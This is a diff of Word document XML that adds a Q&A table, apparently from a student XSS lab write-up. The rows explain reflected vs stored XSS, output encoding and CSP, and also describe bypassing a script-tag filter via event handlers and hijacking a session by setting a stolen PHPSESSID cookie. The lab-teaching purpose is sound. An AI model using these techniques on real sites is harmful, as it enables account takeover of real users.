+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Question</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Answer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Reflected vs Stored XSS?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Reflected is one-time via URL; Stored is saved to DB and hits every visitor — more dangerous</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t xml:space="preserve">What does </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>htmlspecialchars</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>) do?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Encodes &lt;, &gt;, " etc. into HTML entities, preventing tag injection. </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>strip_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>tags</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>) was used here instead — which is weaker</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Why could you bypass the filter?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Filter only removes &lt;script&gt; tags, not event handlers on other elements</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>What is CSP?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Content Security Policy — a browser header that restricts which scripts can execute, blocking inline event handlers</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>How to use stolen cookie?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Attacker sets </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>document.cookie</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = "PHPSESSID=</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>stolen_value</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>" in their browser to hijack the session</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -3108,6 +5068,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="1F3864"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Submission Checklist</w:t>
       </w:r>
     </w:p>
@@ -3326,7 +5287,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId9"/>
+      <w:footerReference w:type="default" r:id="rId12"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -4086,7 +6047,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -4275,6 +6235,315 @@
     <w:link w:val="Footer"/>
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="00A324CB"/>
+  </w:style>
+  <w:style w:type="table" w:styleId="GridTable5Dark-Accent4">
+    <w:name w:val="Grid Table 5 Dark Accent 4"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="50"/>
+    <w:rsid w:val="00A75FD0"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tcPr>
+      <w:shd w:val="clear" w:color="auto" w:fill="CAEDFB" w:themeFill="accent4" w:themeFillTint="33"/>
+    </w:tcPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F9ED5" w:themeFill="accent4"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F9ED5" w:themeFill="accent4"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F9ED5" w:themeFill="accent4"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F9ED5" w:themeFill="accent4"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Vert">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="95DCF7" w:themeFill="accent4" w:themeFillTint="66"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Horz">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="95DCF7" w:themeFill="accent4" w:themeFillTint="66"/>
+      </w:tcPr>
+    </w:tblStylePr>
+  </w:style>
+  <w:style w:type="table" w:styleId="GridTable5Dark-Accent6">
+    <w:name w:val="Grid Table 5 Dark Accent 6"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="50"/>
+    <w:rsid w:val="00C2670F"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tcPr>
+      <w:shd w:val="clear" w:color="auto" w:fill="D9F2D0" w:themeFill="accent6" w:themeFillTint="33"/>
+    </w:tcPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="4EA72E" w:themeFill="accent6"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="4EA72E" w:themeFill="accent6"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="4EA72E" w:themeFill="accent6"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="4EA72E" w:themeFill="accent6"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Vert">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="B3E5A1" w:themeFill="accent6" w:themeFillTint="66"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Horz">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="B3E5A1" w:themeFill="accent6" w:themeFillTint="66"/>
+      </w:tcPr>
+    </w:tblStylePr>
+  </w:style>
+  <w:style w:type="table" w:styleId="GridTable5Dark-Accent3">
+    <w:name w:val="Grid Table 5 Dark Accent 3"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="50"/>
+    <w:rsid w:val="00B22CBB"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
